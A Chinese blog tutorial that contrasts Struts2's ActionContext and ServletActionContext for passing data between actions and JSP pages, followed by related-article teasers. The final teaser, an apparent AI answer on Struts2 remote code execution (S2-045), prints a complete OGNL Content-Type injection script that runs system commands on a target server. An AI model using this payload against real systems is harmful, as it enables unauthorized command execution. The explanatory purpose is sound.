Struts 2 ——ActionContext和ServletActionContext区别

最新推荐文章于 2024-09-21 16:31:24 发布
原创 最新推荐文章于 2024-09-21 16:31:24 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了ActionContext和ServletActionContext在MVC框架中的角色,阐述了它们如何在Action和JSP页面间实现数据传递,包括数据的存储和获取方法,以及如何通过EL表达式在前端显示数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、ActionContext

       顾名思义,ActionContext是Action执行时的上下文,实质为一个Map容器,用于存放Action在执行时需要用到request\response\session等对象,在action 和jsp间实现数据传递。可通过put,get方法可对ActionContext进行赋值取值操作;

       在实际使用中,经常出现Action和JSP页面间数据传递的操作;例如前台传给JSP用户基本信息;Action中将底层查到的数据存入session 或值栈中,前台通过JSTL标签和EL表达式,查找该数据的getset方法,获取Action中属性,从而将数据显示页面;

Action与页面传值:

       通过ActionContext容器中的值栈的set方法或是session的put方法,均可将Action中获得的数据存入,前台通过java特定的如EL表达式获取。

<span style="font-size:24px;">ActionContext.getContext().getValueStack().set("user",user);
ActionContext.getContext().getSession().put("user",user);</span>
前台: 

<span style="font-size:24px;">用户名:<s:property value="user.username ">
性别:<s:property value="user.sex"></span>
注意:

1、user.username 应对应UserAction中getUsername方法,方才可获取用户名。因为java中面向对象的机制,所以对于某个Action类,均通过实例化对象后,通过get set方法获取或设定action属性值。

2、若Action将值存入session中时需要通过添加“#”获值,形如:value="#user.username“,而存入值栈中时则可直接user.username获取

二、ServletActionContext

ServletActionContext类直接继承了ActionContext,所以除了获取值栈、session对象之外,它还提供了直接与Servlet相关对象(request 和response)访问的功能。

<span style="font-size:24px;">ServletActionContext.getRequest().getSession().setAttribute("user",user);
ServletActionContext.getRequest().getSession().getAttribute(user);</span></span>
<span style="font-size:24px;">ServletActionContext.getContext().getValueStack().set("user",user);
ServletActionContext.getContext().getValueStack().push(user);</span>
注意:

ActionContext能够实现我们的功能,最好就不要使用ServletActionContext,尽量避免Action直接访问Servlet的对象,避免耦合度过高。

SSH开发模式——Struts2进阶
。。。
06-04 2676
在之前我有写过关于struts2框架的博客,好像是写了三篇,但是之前写的内容仅仅是struts2的一些基础知识而已,struts2还有很多有趣的内容等待着我们去发掘。我准备再写几篇关于struts2的高级内容,之前的一些基础知识我就不会再提了,所以,在看进阶篇的struts2时,我希望你有一定的struts2框架的基础,没有的话也不要紧,因为入门struts2非常简单,随手看几篇博客就算入门了,但...
Struts2核心(4)——登录问题
悟已往之不谏,知来者之可追
07-18 716
转载请注明:http://blog.youkuaiyun.com/uniquewonderq 1.1如何获取Session 获取session的方式 ——ActionContext ActionContext.getContext().getSession() 返回类型为Map ——ServletActionContext ServletActionContext.getRequest(
ServletContext,ActionContext,ServletActionContext
热门推荐
ocean1010的专栏
01-23 1万+
<br />ServletContext<br />ServletContext从他的package信息可以看出,它是标准的JavaEE WebApplication类库 javax.servlet.ServletContext<br />ServletContext提供了标准的Servlet运行环境,其实就是一些servletweb container进行通信的方法 public interface ServletContext {<br /><br /> // Returns the URL pref
ActionContextServletActionContext区别
WALK ON
04-10 105
1.ActionContext xwork框架的ActionContext是Action执行时的上下文,存放Action执行时需要用到的对象。在使用webwork时,其中放有Parameter、Session、ServletContext、Locale等信息。这样,webwork负责将Servlet相关数据转换为与ServletAPI无关的Map对象(即ActionContext),使得xwor...
Struts2中的ActionContextServletActionContext区别
kevin_love_it的博客
08-12 322
转载自:http://blog.youkuaiyun.com/lushuaiyin/article/details/7017931 1. ActionContextStruts2开发中,除了将请求参数自动设置到Action的字段中,我们往往也需要在Action里直接获取请求(Request)或会话(Session)的一些信息,甚至需要直接对JavaServlet Http的请求(H
ActionContextServletActionContext
被世界遗弃的江的博客
06-01 1057
ActionContext是Action执行时的上下文,里面存放着Action在执行时需要用到的对象,我们也称之为广义值栈。 Struts2在每次执行Action之前都会创建新的ActionContext,在同一个线程里ActionContext里面的属性是唯一的,这样Action就可以在多线程中使用。 1:ActionContext的线程安全性 那么Struts2是如何保证Actio
Apache Struts2远程代码执行漏洞(S2-001)复现
2401_87298694的博客
09-21 871
​ OGNL还支持处理集合即Map,ListSet。​ 除了#,% 在 OGNL 表达式中也经常出现,它提供一个OGNL表达式运行环境。
Struts2(三)——数据在框架中的数据流转问题
学会改变自己——才能突破
03-05 8380
一款软件,无在乎对数据的处理。而B/S软件,一般都是用户通过浏览器客户端输入数据,传递到服务器,服务器进行相关处理,然后返回到指定的页面,进行相关显示,完成相关功能。这篇博客重点简述一下Struts2框架是如何进行数据流转处理呢!            一,首先学习一种表达式:OGNL:Object-Graph NavigationLanguage(对象图形导航语言)
ActionContext,ServletContextServletActionContext有什么区别
paullinjie的博客
04-19 3038
票赞成 他们之间有很多区别。 ServletContext 从ServletContext的包( javax.servlet.ServletContext )我们可以知道它是标准的JavaEE WebApplication类库。 ServletContext提供了标准的Servlet运行时环境。 实际上是servlet与web容器进行通信的一些方法。 p
Struts2ActionContextServletActionContext详解
lilun517735159的博客
09-28 469
1. ActionContext ActionContext是被存放在当前线程中的,获取ActionContext也是从ThreadLocal中获取的。所以在执行拦截器、 actionresult的过程中,由于他们都是在一个线程中按照顺序执行的,所以可以可以在任意时候在ThreadLocal中获取 ActionContextActionContext包括了很多信息,比如S
StrutsActionContextServletActionContext的比较
数据库天地
11-12 167
ActionContextStruts2开发中除了将请求参数自动设置到Action的字段中,往往也需要在Action里直接获取请求(Request)或会话(Session)的一些信息,甚至需要直接对JavaServlet Http的请求(HttpServletRequest)响应(HttpServletResponse)操作。例如在Action中取得request请求参数"user...
servletActionContext.getContext默认获取contextmap 数据默认存储在contextmap的request中
weixin_30652271的博客
02-19 255
转载于:https://www.cnblogs.com/classmethond/p/10398904.html
ServletActionContext源码及浅析
amosilin的博客
05-22 2554
先贴源码(ServletActionContext.java) /* * $Id: ServletActionContext.java 651946 2008-04-27 13:41:38Z apetrelli $ * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor li
ActionContext ServletActionContext
huanggangmaojin的专栏
08-12 640
1. ActionContextStruts2开发中,除了将请求参数自动设置到Action的字段中,我们往往也需要在Action里直接获取请求(Request)或会话(Session)的一些信息,甚至需要直接对JavaServlet Http的请求(HttpServletR
ActionContextServletActionContext区别以及action访问servlet API的三种方法
Golden_lion的博客
07-18 4578
1. ActionContextStruts2开发中,除了将请求参数自动设置到Action的字段中,我们往往也需要在Action里直接获取请求(Request)或会话(Session)的一些信息,甚至需要直接对JavaServlet Http的请求(HttpServletRequest),响应(HttpServletResponse)操作. 我们需要在Action中取得request
ServletContext,ActionContextServletActionContext详解
Golden_lion的博客
07-18 3698
ServletContext ServletContext从他的package信息可以看出,它是标准的JavaEE WebApplication类库 javax.servlet.ServletContext ServletContext提供了标准的Servlet运行环境,其实就是一些servletweb container进行通信的方法
ServletContext、ActionContextServletActionContext区别
借物小人的博客
03-16 7988
Servlet 描述 这是一组接口,规范(sun公司并没有去实现它) 它的实现就是由各大服务器厂商(Tomcat)去实现 Tomcat是一个javaweb服务器,也是一个Servlet容器 Servlet是所有创建,运行,销毁都由Servlet容器完成 Servlet 默认是单例模式,在web 容器中只创建一个实例,所以多个线程同时访问servlet的时候,Servlet是线程不安全的 生命周期 ...
ActionContextServletActionContext区别
u012853826的专栏
03-14 1881
什么是MVC    1.Model模型           模型的职责是负责业务逻辑,包含两部分:业务数据业务处理逻辑.比如实体类, DAO,Service都属于模型层    2.View视图           视图的职责是显示界面用户交互(收集用户信息)。属于视图的类是不包含业务 逻辑控制逻辑的JSP    3.Controller控制器           控制器是模型
给我简单直观的说一下命令执行类漏洞struct2远程命令执行漏洞
最新发布
04-03
### 命令执行类漏洞概述 命令执行类漏洞是指攻击者能够通过某种方式向目标系统注入并运行任意操作系统命令的一类安全漏洞。这类漏洞通常发生在应用程序未对用户输入进行严格校验的情况下,使得恶意用户可以利用特定的语法结构绕过验证机制,最终实现非法操作系统的指令。 对于Web应用而言,常见的命令执行漏洞场景包括但不限于文件上传、动态参数解析以及外部接口调用等功能模块[^1]。 --- ### Struts2 远程命令执行漏洞基本概念及原理 #### 1. **Struts2 框架简介** Apache Struts2 是一种流行的Java Web开发框架,它提供了丰富的功能支持开发者构建复杂的交互式网站。然而,由于其设计复杂度较高,在某些情况下可能存在安全隐患,其中最典型的便是远程命令执行漏洞。 #### 2. **S2-045 (CVE-2017-5638) 漏洞分析** 此漏洞存在于使用 Jakarta 插件处理文件上传的过程中。当程序接收到 HTTP 请求时,如果 Content-Type 参数未经充分过滤,则可能允许攻击者构造特殊的 Payload 来触发 OGNL 表达式的求值行为,从而达到执行任意命令的目的[^2]。 具体来说,问题根源在于默认使用的 Multipart 解析器——`jakarta` 实现部分未能有效隔离用户可控数据与内部逻辑表达式之间的边界关系,致使后者可被前者污染而引发进一步危害[^4]。 #### 3. **技术细节说明** 以下是该类型缺陷的核心工作机制描述: - 攻击面定位:主要集中在服务器端接收客户端提交的数据包环节; - 利用条件判断:需满足版本范围内的受影响组件部署现状; - 执行流程追踪:从初始请求到达直至最终完成恶意脚本加载全过程记录; 例如下面给出了一段模拟测试环境下的 Python 脚本用于演示如何发送带有危险负载的消息给受害主机尝试获取反弹 shell连接效果展示[^3]: ```python import requests url = 'http://example.com/upload' payload = { 'Content-Type': '''%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected](\"Windows\")).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''' } response = requests.post(url, headers=payload) print(response.text) ``` 上述代码片段展示了如何构造一个精心设计的内容类型字段以嵌入恶意OGNL语句,并试图让远端机器返回当前用户的标识信息作为响应的一部分。 --- ### 总结 综上所述,Struts2 的远程命令执行漏洞主要是因为不当的安全策略设置加上缺乏必要的输入净化措施所引起的重大风险事件之一。通过对这些案例的研究学习可以帮助我们更好地理解软件安全性的重要性及其防护手段的应用价值所在。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值